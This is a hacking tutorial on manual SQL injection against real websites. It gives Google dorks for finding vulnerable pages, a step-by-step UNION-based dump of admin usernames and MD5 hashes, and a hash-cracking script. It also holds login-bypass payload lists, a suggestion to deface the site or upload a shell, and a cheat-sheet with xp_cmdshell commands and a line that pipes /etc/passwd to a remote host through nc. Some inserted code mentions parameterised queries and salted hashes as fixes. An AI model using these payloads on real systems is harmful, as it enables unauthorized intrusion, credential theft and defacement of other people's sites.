Manual SQL Injection Trick And Tip

So far we have covered a few hacking terms and some password-stealing methods such as phishing and keyloggers. Now we move a little further: this post is about SQL INJECTION, a class of attack that lets us compromise web sites through their database (mostly newly launched sites and educational sites).

OK, let's start; please pay attention.


THIS IS FOR EDUCATIONAL PURPOSES ONLY. I WILL NOT BE RESPONSIBLE FOR ANY HARM CAUSED BY YOU.


Here is the complete step-by-step SQL injection tutorial for beginners:


1). Search for a vulnerable site.
=======================
Copy one of the dorks below (highlight it, Ctrl+C) and paste it (Ctrl+V) into the Google search box. Each one matches pages that pass a parameter such as id=, num= or cat= straight to a PHP script, which is where injectable code is most often found.

allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
...and this one is just priceless:
"login: *" "password= *" filetype:xls




2) Definitions:
==========

inurl: -> a Google search operator that matches the search term against the page's URL instead of its content.
.php?id= -> the part of the URL we are looking for. SQL injection works by adding our own SQL after the = sign, where the script expects a plain value. Such a search string is commonly referred to as a dork.
Dork definition: the part of a site's URL that tells you it may be vulnerable to a certain SQL injection. A finished injection looks like this (the parent_id value is replaced by a UNION query that reads login names and passwords from a dir_login table):
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
Before building anything like that, we check whether the parameter is injectable at all by adding a single quote (') to the end of the URL.


3) So the url will be like this:
======================

http://www.site.com/news_archive.php?id=6'
We hit enter and get this result:
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
If you get a database error, missing text or a blank page, the parameter is probably injectable; an error by itself is not proof, but it is a strong sign. The message above is conclusive: MySQL complains about our quote, so it reached the database unescaped.
Now we know that the site is vulnerable.



4) Find the columns:
===============

The next step is to find out how many columns the vulnerable query returns.
To find it we use ORDER BY followed by -- (a MySQL comment marker, which discards the rest of the original query).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
We can jump ahead in bigger steps to save requests:
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we get an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
The error for this column looks like this:
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
This means the query returns only 14 columns: ORDER BY 15 refers to a column that does not exist.


5) Union select:
===========

Now we put a minus sign in front of the id (so the original WHERE clause matches no row and only our own row is displayed) and append a UNION SELECT with the same number of columns we just found.
UNION appends the rows of a second SELECT to the first one, so whatever we select is rendered wherever the page normally prints the article.
It looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
We hit enter.
Some of the numbers appear on the page, like this:
6
, 5
8
Those are the column positions the page actually displays; only those can be used to show data in the next steps.


6) Check the MySQL version
====================

Now we check the MySQL VERSION by replacing one of the numbers that appeared in the previous step with @@version.
Let's say I choose 8; we replace 8 with @@version, so it looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you get a result like this:
6
, 5
5.1.32 <-- this is the version
Any 5.x or later version has the information_schema database, which the next two steps rely on.


7) Getting the table names.
=================

We use group_concat(table_name), which joins every matching table name into one comma-separated string so the whole list fits in the single column we control.
Replace @@version with group_concat(table_name)
so it looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
We are not done yet (don't hit enter): between the number 14 and the trailing -- insert this:
+from+information_schema.tables+where+table_schema=database()--
(the + signs are URL-encoded spaces; information_schema.tables lists every table, and database() restricts it to the schema the site is using)
It will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
We hit enter and get this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_user_md5


8) Column names:
=============

Now that we have the TABLE NAMES, we move on to the COLUMN NAMES.
Use group_concat(column_name) in place of group_concat(table_name).
But before that we must choose a table. I choose auth_user_md5, because that is where the credentials should be.
To keep quotes out of the URL (they are often escaped or filtered), we write the table name as hex.
Use any text-to-hex converter: paste auth_user_md5 into the text box and click encode.
The hex of auth_user_md5 looks like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
Before proceeding, remove the spaces between the bytes: 617574685f757365725f6d6435
Now replace group_concat(table_name) with group_concat(column_name):
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
and also replace +from+information_schema.tables+where+table_schema=database()--
with
+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
(the digits after 0x are the hex of auth_user_md5 we encoded above)
Note: always put 0x in front of the hex; MySQL then treats it as a string literal, exactly as if it were 'auth_user_md5' in quotes.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
Now hit enter and you get a result like this:
UserID,Username,Password,Perms,FirstName,MiddleName,LastName,Position,EmailAddress,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status


9) Main part:
===========

We use 0x3a (the hex for a colon, ':') as a separator to pull what we want out of the DATABASE: passwords, usernames, etc.
Replace group_concat(column_name) with group_concat(UserID,0x3a,Username,0x3a,Password,0x3a,Perms,0x3a,FirstName,0x3a,MiddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3a,Status)
but I prefer group_concat(Username,0x3a,Password) for less effort.
Also replace +from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- with +from+auth_user_md5--
(617574685f757365725f6d6435 is the hex value of auth_user_md5; now that we know the table exists we can simply name it).
The result looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
I hit enter and we get this:
admin usernames: k2admin / admin
passwords as MD5 hashes: 21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
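Steps 3 to 9 as one runnable walkthrough. This is an added example, not code from the original tutorial: it stands up a small in-memory sqlite3 database (constructed, with a 3-column NewsArticle table instead of the 14-column one above) and a deliberately vulnerable news_archive() handler that concatenates the id parameter into its query the way news_archive.php does. The probing functions send the same payloads the manual steps describe; comments mark where MySQL syntax (information_schema, @@version, 0x hex strings) differs from sqlite. The table and column names, the users and the hashes are taken from the tutorial's output; the schema and the function names are assumptions for the demo.

```python
import sqlite3

# Constructed in-memory stand-in for the tutorial's MySQL back end, so the
# walkthrough runs offline.  Where MySQL syntax differs from sqlite
# (information_schema, @@version, 0x hex strings) the comments say so.
SCHEMA = """
CREATE TABLE NewsArticle (NewsID INTEGER, Title TEXT, Body TEXT);
INSERT INTO NewsArticle VALUES (6, 'Site news', 'Nothing to see here');
CREATE TABLE auth_user_md5 (UserID INTEGER, Username TEXT, Password TEXT);
INSERT INTO auth_user_md5 VALUES (1, 'k2admin', '21232f297a57a5a743894a0e4a801fc3');
INSERT INTO auth_user_md5 VALUES (2, 'admin',   '97fda9951fd2d6c75ed53484cdc6ee2d');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def news_archive(conn, id_param):
    """The vulnerable handler behind news_archive.php?id=: the parameter is
    pasted into the SQL unquoted.  Returns the rows, or the error text the
    page leaks (step 3 depends on that leak)."""
    sql = "SELECT * FROM NewsArticle WHERE NewsID=" + id_param
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "Database error: " + str(exc)


def is_error(result):
    return isinstance(result, str)


def count_columns(conn, max_cols=32):
    """Step 4: ORDER BY n works while n <= number of columns and errors
    after it, so the last n that worked is the column count."""
    for n in range(1, max_cols + 1):
        if is_error(news_archive(conn, f"6 order by {n}--")):
            return n - 1
    return None


def union_row(conn, exprs, tail=""):
    """Steps 5-9: a negative id makes the original WHERE match nothing, so
    the row of our UNION SELECT is what the page renders."""
    payload = "-6 union select " + ", ".join(exprs) + " " + tail + "--"
    result = news_archive(conn, payload)
    return None if is_error(result) else result[0]


def list_tables(conn, ncols):
    # MySQL: group_concat(table_name) from information_schema.tables
    #        where table_schema=database()
    exprs = ["1"] * ncols
    exprs[1] = "group_concat(name)"          # slot 2 is the one the page shows
    return union_row(conn, exprs, "from sqlite_master where type='table'")[1]


def list_columns(conn, ncols, table):
    # MySQL: group_concat(column_name) from information_schema.columns
    #        where table_name=0x<hex of table name>
    exprs = ["1"] * ncols
    exprs[1] = "group_concat(name)"
    return union_row(conn, exprs, f"from pragma_table_info('{table}')")[1]


def dump_credentials(conn, ncols, table, user_col, pass_col):
    # MySQL: group_concat(Username,0x3a,Password); sqlite concatenates with ||
    exprs = ["1"] * ncols
    exprs[1] = f"group_concat({user_col} || ':' || {pass_col})"
    return union_row(conn, exprs, f"from {table}")[1].split(",")


def to_mysql_hex(name):
    """Step 8's trick: MySQL reads 0x617574685f757365725f6d6435 as the
    string 'auth_user_md5', so the table name needs no quotes in the URL.
    (sqlite treats 0x... as an integer, which is why the functions above
    quote the name instead.)"""
    return "0x" + name.encode().hex()


if __name__ == "__main__":
    db = connect()
    print(news_archive(db, "6'"))                # step 3: leaked syntax error
    n = count_columns(db)                        # step 4: 3 here, 14 in the tutorial
    print(n, list_tables(db, n))                 # step 7
    print(list_columns(db, n, "auth_user_md5"))  # step 8
    print(to_mysql_hex("auth_user_md5"))
    print(dump_credentials(db, n, "auth_user_md5", "Username", "Password"))  # step 9
```

Run it and the leaked error, the column count, the table list, the column list and the username:hash pairs are printed in the order the manual steps produce them. On the server side, casting id to an integer or binding it as a query parameter stops this whole chain at step 3.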


10) Cracking the password:
=====================

Because the passwords are stored as unsalted MD5 hashes, we need to crack them, for example with an online hash lookup service (MD5, SHA1, MySQL).
The first hash, 21232f297a57a5a743894a0e4a801fc3, is simply the MD5 of "admin".
Result of the lookup:
pass: x1R0zYB3bex
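A dictionary attack on the two hashes from step 9, as an added example rather than the page's own tool: unsalted MD5 is fast, so every candidate word is hashed once and checked against all targets together. The wordlist is constructed for the demo and deliberately tiny; with a real list such as rockyou.txt the loop is the same.

```python
import hashlib

# Hashes as dumped in step 9; the wordlist is a constructed stand-in for a
# real one.
DUMPED = {
    "k2admin": "21232f297a57a5a743894a0e4a801fc3",
    "admin": "97fda9951fd2d6c75ed53484cdc6ee2d",
}
WORDLIST = ["123456", "password", "k2admin", "admin", "letmein", "qwerty"]


def crack_md5(hashes, wordlist):
    """Dictionary attack on unsalted MD5: hash each candidate once and look
    it up against every target at the same time, so the cost is the size of
    the wordlist, not wordlist x targets."""
    targets = {h.lower() for h in hashes}
    found = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        if digest in targets:
            found[digest] = word
    return found


def crack_users(users, wordlist):
    """Map username -> recovered password (None if not in the wordlist)."""
    found = crack_md5(users.values(), wordlist)
    return {user: found.get(h.lower()) for user, h in users.items()}


if __name__ == "__main__":
    for user, pw in crack_users(DUMPED, WORDLIST).items():
        print(user, pw or "<not in wordlist>")
```

The second hash is not in this small list; the original used an online lookup service for it. A per-user salt defeats the multi-target trick, because each target then needs its own pass over the wordlist, which is why salted, slow hashes (bcrypt, scrypt, Argon2) are the fix on the defending side.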


What is SQL injection?
Answer: Basically, it is a technique for making a website execute a query of your own choosing in order to extract information such as login details, user lists etc. from the website's database, for personal gain or otherwise.
There are many kinds of query that can be used to extract information from a website's database illegally.
In this tutorial the query we'll be using is the basic SQL injection query that can be entered on a login page.
Example:
Code:
Username: admin
Password: ' or '1'='1
When you enter the password ' or '1'='1 on an unprotected website, there is a chance you gain access.
How does it happen? Look at the query the site ends up executing:
Code:
SELECT * FROM users
WHERE username = 'admin' AND password = '' or '1'='1'
In the password field we first typed a quote ', which closes the string the application opened, followed by or '1'='1, a condition that is always true.
Because AND binds tighter than OR, the WHERE clause reads (username = 'admin' AND password = '') OR ('1'='1'). The second half is true for every row, so the query returns rows and the login check passes.
However, some websites filter or escape these characters, so it is best to try different variants too. You can find some below.
Now that you have an idea of how basic SQL injection queries work, let's put it to use, shall we?
Step1: Finding websites with Login Pages
Alright, our basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass them.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about them, please visit my previous tutorial: http://www.hackforums.net/showthread.php?tid=2059771
In this tutorial, we can use these dorks:
Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
If you want to find more dorks when using this method, you can find them here:
Code:
http://pastebin.com/ZjxpivV3
Step2: Now Executing the query
Alright, now that you've found a target with a login page, let's play with it a bit.
Here is what you're going to do.
The username will be admin, because most sites have an admin account stored in their database.
Code:
Username: admin
Password: ' or 0=0 --
Didn't work? No worries, there is more than one query to try.
Here is a list of password strings you can use to try to inject the site (they differ in the quote character that closes the string and in the comment sequence that discards the rest of the query, both of which vary between databases):
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
Credits to RealSteal for some of the strings listed above.
Note: this is not always the best way of hacking websites with SQL injection, but with patience you will get used to the method and it will succeed often enough.
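The query above, run for real against a small constructed database. This is an added example, not part of the original post: login_vulnerable() builds the WHERE clause by string concatenation like the query quoted earlier, login_fixed() is the same check with bound parameters, and try_payloads() feeds a few strings from the list above through each. It uses sqlite3 so it runs offline; the users table, its two accounts and the function names are assumptions for the demo. Because SQLite does not know the MySQL # comment, the admin' # payload fails here while admin' -- succeeds, which is exactly why the list carries each payload in several comment styles.

```python
import sqlite3

# Constructed users table standing in for the login page's database.
# Plaintext passwords are only to keep the demo short.
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 'x1R0zYB3bex');
INSERT INTO users VALUES ('bob',   'hunter2');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string concatenation, like the query shown
    in the text.  Returns the username the query matched, or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None          # a payload the engine cannot parse just errors out
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Same check with bound parameters: the input can never become SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# (username, password) pairs taken from the list above.  Which ones work
# depends on the engine's comment syntax: # is MySQL-only, -- is widely
# supported, so the same idea is tried in several spellings.
PAYLOADS = [
    ("admin", "' or '1'='1"),
    ("admin' --", "anything"),
    ("admin' #", "anything"),
    ("' or 'x'='x", "' or 'x'='x"),
]


def try_payloads(conn, login):
    """Returns {(user, pass): matched_username_or_None} for each payload."""
    return {p: login(conn, *p) for p in PAYLOADS}


if __name__ == "__main__":
    db = connect()
    print("vulnerable:", try_payloads(db, login_vulnerable))
    print("fixed:     ", try_payloads(db, login_fixed))
```

Against login_vulnerable() the tautology and the -- comment both return the admin row; against login_fixed() every payload is compared as a literal string and none matches.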
Step3: I LOGGED in, what to do now?!
Well, first of all, if you did log in, then congratulations on your first successful SQL injection.
There are many things you can do with the site from here.
Most people would love to deface it.
Others will upload a shell and use the box for other purposes such as rooting or web hosting.
If you would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial on how to deface a page will be coming soon. You might also want to watch the video (linked from the original post) to see how I log in as Administrator on an SQLi-vulnerable website.



Extras:
Common Password Queries:
Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

If the database is version 5 or higher, queries using UNION, GROUP BY, @@version, ORDER BY, BENCHMARK etc. can be executed and information_schema is available. The fragments below are a mixed cheat-sheet covering MySQL, Microsoft SQL Server, DB2, PostgreSQL, Ingres and others; several are cut short and need completing for the target.
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
master..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1;
SELECT cast('123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
select current_user;
select session_user;
SELECT current_setting('data_directory');
select current_setting('log_connections');
select current_setting('log_statement');
select current_setting('port');
select current_setting('password_encryption');
select current_setting('krb_server_keyfile');
select current_setting('virtual_host');
select current_setting('config_file');
select current_setting('hba_file');
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'
select dbmsinfo('_version');
select dbmsinfo('session_user');
select dbmsinfo('system_user');
select dbmsinfo('database');
select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');
select top 10 blah from table;
select first 10 blah from table;
select table_name
select relid
select column_name
select 1 union select 2;
select cast('123' as integer);
select @@version
select name from master..syslogins
select name from master..sysdatabases
convert(integer
waitfor delay '0:0:5'

MySQL 4 has no information_schema, so the table- and column-listing queries used above (steps 7 and 8) do not work against it; the names have to be guessed instead. UNION itself is available from MySQL 4.0 onwards, and MySQL 3.x does not support it at all.

Manual SQL Injection Trick And Tip, reviewed by Anonymous on December 25, 2015
